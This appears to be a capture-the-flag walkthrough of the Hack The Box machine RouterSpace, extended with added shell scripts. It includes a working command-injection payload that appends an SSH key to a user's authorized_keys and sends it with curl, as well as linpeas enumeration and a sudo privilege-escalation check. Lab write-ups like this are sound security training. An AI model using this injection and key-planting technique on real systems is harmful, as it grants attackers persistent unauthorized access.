RouterSpace

Intro

RouterSpace is an easy machine with an Android app that is vulnerable to command injection; privilege escalation was straightforward too. The hard part was getting an Android emulator working on my machine.

I ran Nmap and found only two open ports: 22 (SSH) and 80 (HTTP).

On the website running on port 80 I couldn't find anything useful other than a download link for an APK file named "RouterSpace.apk".

I downloaded the app, then spent hours trying to find and set up a usable Android emulator for Linux. I eventually got Anbox installed and installed the app on the emulator with ADB.

With the app installed, the next step is intercepting the HTTP traffic flowing in and out of it. That needs a proxy listener in Burp Suite and a matching proxy setting on the emulator, pushed through adb from the terminal. The command below sets the emulator's global HTTP proxy:

adb shell settings put global http_proxy 10.10.16.28:8090

10.10.16.28 is my HTB tun0 interface IP and 8090 is the port the Burp proxy listener is configured on, as seen below. The listener has to be bound to that tun0 address (or to all interfaces) rather than only to 127.0.0.1, otherwise the emulator cannot reach it.

With the proxy in place, the request intercepted after tapping the "check status" button above can be seen below. I sent it to Burp Repeater, but the response redirected to routerspace.htb, so I had to add that domain to my /etc/hosts file mapped to the machine's IP address.

After adding the entry to the hosts file:
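The two setup steps above (proxying the emulator through Burp and making the redirect target resolvable) as an added shell example; this is not from the original post. The proxy IP and port are the ones used above; the target IP is read from an environment variable because the post does not give it, and the emulator is only contacted when the script is run with --live.

```bash
#!/bin/sh
# Added example, not from the original post: point the emulator at Burp and
# give routerspace.htb a hosts-file entry, idempotently.
set -eu

# Set the emulator's global HTTP proxy to HOST:PORT and read it back, so a
# typo in the IP is caught immediately instead of showing up as a dead app.
set_adb_proxy() {            # usage: set_adb_proxy HOST PORT
    adb shell settings put global http_proxy "$1:$2"
    [ "$(adb shell settings get global http_proxy | tr -d '\r')" = "$1:$2" ]
}

# ":0" clears the proxy again; a stale proxy setting leaves the emulator
# without network the next time Burp is not running.
clear_adb_proxy() {
    adb shell settings put global http_proxy :0
}

# Map NAME to IP in HOSTS_FILE. Any existing non-comment line that already
# lists NAME is dropped first, so a mapping left over from another box
# cannot win over the new one.
add_host_entry() {           # usage: add_host_entry HOSTS_FILE IP NAME
    hosts="$1"; ip="$2"; name="$3"
    tmp="$(mktemp)"
    awk -v name="$name" '
        $1 ~ /^#/ { print; next }
        { for (i = 2; i <= NF; i++) if ($i == name) next; print }' "$hosts" > "$tmp"
    printf '%s\t%s\n' "$ip" "$name" >> "$tmp"
    cat "$tmp" > "$hosts"    # write through, keeping the file's owner and mode
    rm -f "$tmp"
}

# Resolve NAME from HOSTS_FILE only (no DNS): what curl and Burp will use.
resolve_host() {             # usage: resolve_host HOSTS_FILE NAME
    awk -v name="$2" '
        $1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == name) { print $1; exit } }' "$1"
}

if [ "${1:-}" = "--live" ]; then
    # Live mode only: needs adb on PATH and root for /etc/hosts.
    set_adb_proxy 10.10.16.28 8090
    add_host_entry /etc/hosts "${BOX_IP:?set BOX_IP to the machine IP}" routerspace.htb
    echo "routerspace.htb -> $(resolve_host /etc/hosts routerspace.htb)"
fi
```

Run it as `BOX_IP=<machine ip> sudo ./setup.sh --live`; without --live it only defines the functions, which is what lets the hosts-file logic be checked against a scratch file.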

As the response below shows, the request is vulnerable to command injection.

RCE

I tried to turn the injection into a shell but couldn't. From enumeration, though, I knew the user on the machine is paul, so all I had to do was use the injection to append my public key to that user's "authorized_keys" file. Note that I generated a fresh SSH key pair for this: you shouldn't put your personal or production keys anywhere they don't belong, and definitely not on HTB boxes.
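The authorized_keys approach described above, as an added shell example that is not from the original post. It assumes the injectable field is a JSON "ip" parameter and uses a placeholder endpoint path, because the post does not show the request body; the embedded public key is constructed and not a real key. The request is only sent when run with --send.

```bash
#!/bin/sh
# Added example, not from the original post: build the command-injection
# payload that appends a throwaway SSH public key to paul's authorized_keys.
set -eu

TARGET_USER=paul
# Constructed, non-functional key so the example runs offline. For a real box:
#   ssh-keygen -t ed25519 -f ./htb_routerspace -N '' && PUBKEY="$(cat ./htb_routerspace.pub)"
PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleConstructedKeyMaterial0000000000000000000 htb-throwaway'

# The shell fragment the injected ';' will run on the box. It creates ~/.ssh
# in case the user never had one, appends rather than overwrites the key, and
# sets the modes sshd insists on (a key in a world-readable file is ignored).
build_injected_command() {   # usage: build_injected_command USER PUBKEY
    user="$1"; key="$2"
    printf "mkdir -p /home/%s/.ssh; echo '%s' >> /home/%s/.ssh/authorized_keys; chmod 700 /home/%s/.ssh; chmod 600 /home/%s/.ssh/authorized_keys" \
        "$user" "$key" "$user" "$user" "$user"
}

# Wrap it in the JSON the app sends. A harmless value comes first so the
# original command still gets a plausible argument before our ';'.
# The "ip" field name is an assumption.
build_json_body() {          # usage: build_json_body USER PUBKEY
    printf '{"ip":"0.0.0.0; %s"}' "$(build_injected_command "$1" "$2")"
}

# A quote or backslash in the key would break both the single-quoted echo and
# the JSON string; OpenSSH public keys never contain them, but check anyway.
payload_is_safe() {          # usage: payload_is_safe PUBKEY
    case "$1" in
        *\'*|*\"*|*\\*) return 1 ;;
        *) return 0 ;;
    esac
}

if [ "${1:-}" = "--send" ]; then
    # Live mode only. BASE_URL and the endpoint path are assumptions; add any
    # headers Burp showed the app sending (e.g. its User-Agent) to the curl.
    payload_is_safe "$PUBKEY" || { echo "key contains characters that break the payload" >&2; exit 1; }
    curl -s -X POST "${BASE_URL:?e.g. http://routerspace.htb}/ASSUMED/check-status-endpoint" \
        -H 'Content-Type: application/json' \
        -d "$(build_json_body "$TARGET_USER" "$PUBKEY")"
    echo
    echo "then: ssh -i ./htb_routerspace ${TARGET_USER}@routerspace.htb"
fi
```

Appending rather than overwriting matters on a shared lab box: clobbering an existing authorized_keys file locks out whoever else is working the machine, and on a real engagement it destroys evidence.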


Privilege Escalation

I was able to log in as paul and grab the user flag. Next was escalating to root. For that I transferred linpeas.sh to the box; the usual python3 http.server approach didn't work, probably because of a firewall policy, so I used scp to push the file over the SSH access I already had.

The "chmod +x" makes the script executable before running it.

The enumeration flagged the installed sudo version: there is a well-known vulnerability in sudo versions prior to 1.9.5. It's worth confirming the exact version sudo reports before spending time on an exploit.
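The version check as an added shell example, not from the original post. The post rounds the cutoff to "prior to 1.9.5"; the first release carrying the fix for that sudo bug is 1.9.5p2, and the affected releases are 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, so 1.9.5 and 1.9.5p1 are still affected. Those ranges are from my own knowledge of the fix, not from the post.

```bash
#!/bin/sh
# Added example, not from the original post: decide from `sudo -V` output
# whether the installed sudo is in the affected range before fetching a PoC.
set -eu

# Turn a version like "1.8.31p2" into one comparable integer: a leading 1,
# then major (2 digits), minor (2), patch (3) and the "pN" level (2).
# Missing fields count as zero, so "1.9.5" sorts just below "1.9.5p1".
sudo_version_key() {         # usage: sudo_version_key VERSION_STRING
    ver="$1"; plevel=0
    case "$ver" in
        *p*) plevel="${ver##*p}"; ver="${ver%p*}" ;;
    esac
    major="${ver%%.*}"; rest="${ver#*.}"
    minor="${rest%%.*}"
    case "$rest" in
        *.*) patch="${rest#*.}" ;;
        *)   patch=0 ;;
    esac
    printf '1%02d%02d%03d%02d' "$major" "$minor" "$patch" "$plevel"
}

# Pull the version out of `sudo -V`; its first line reads "Sudo version X".
sudo_version_from_output() { # usage: sudo_version_from_output "$(sudo -V)"
    printf '%s\n' "$1" | awk '/^Sudo version/ { print $3; exit }'
}

# True (exit 0) when VERSION is 1.8.2..1.8.31p2 or 1.9.0..1.9.5p1.
sudo_is_affected() {         # usage: sudo_is_affected VERSION_STRING
    k="$(sudo_version_key "$1")"
    if [ "$k" -ge "$(sudo_version_key 1.8.2)" ] && [ "$k" -le "$(sudo_version_key 1.8.31p2)" ]; then
        return 0
    fi
    if [ "$k" -ge "$(sudo_version_key 1.9.0)" ] && [ "$k" -le "$(sudo_version_key 1.9.5p1)" ]; then
        return 0
    fi
    return 1
}

if [ "${1:-}" = "--check" ]; then
    # Live mode: query the sudo actually installed on this host.
    v="$(sudo_version_from_output "$(sudo -V)")"
    if sudo_is_affected "$v"; then
        echo "sudo $v: in the affected range"
    else
        echo "sudo $v: not affected by this bug"
    fi
fi
```

Run `./sudocheck.sh --check` on the box; without the flag it only defines the functions so the version logic can be exercised against fixed strings.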

A quick search turned up the corresponding CVE here, and I used this PoC to exploit it. I copied the exploit to the box with scp, the same way as linpeas.sh, made it executable and ran it. Just like that, we are root.